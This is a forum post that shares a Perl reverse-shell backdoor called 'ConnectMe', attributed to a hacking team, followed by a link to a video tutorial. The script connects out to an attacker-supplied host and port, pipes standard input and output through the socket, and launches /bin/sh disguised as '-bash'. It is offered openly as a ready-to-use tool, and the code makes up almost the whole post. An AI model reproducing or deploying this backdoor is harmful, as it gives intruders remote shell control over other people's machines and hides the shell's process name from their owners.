Jump to content
Ras

ConnectMe version 1.0 (BackDoor) [privat]

Recommended Posts

Posted

#!/usr/bin/perl
# ConnectMe version 1.0 (BackDoor)
# IRAN HACKERZ SECURITY TEAM
# By Hessam-x
# keep Priv8 or die !!
# Only for team
use Socket;
print "---------------------------------------\n";
print "= ConnectMe (Back Backdoor) =\n";
print "= IRAN HACKERZ SECURITY TEAM =\n";
print "= coded by Hessam-x =\n";
print "---------------------------------------\n";

$host = $ARGV[0];
$port = $ARGV[1];

if (!$ARGV[0]) {
printf "[!] Usage: perl dc.pl <Host> <Port>\n";
exit(1);
}
print "[+] Connecting to $host\n";
$prot = getprotobyname('tcp'); # u can change this
socket(SERVER, PF_INET, SOCK_STREAM, $prot) || die ("[-] Unable to Connect !");
if (!connect(SERVER, pack "SnA4x8", 2, $port, inet_aton($host))) {die("[-] Unable to Connect !");}
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
print "---------------------------------------\n";
print "= ConnectMe (Back Backdoor) =\n";
print "= IRAN HACKERZ SECURITY TEAM =\n";
print "= coded by Hessam-x =\n";
print "---------------------------------------\n";
exec {'/bin/sh'} '-bash' . "\0" x 4;

Videotutorial: http://barzan.persiangig.com/Ro0t%20Video.zip

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...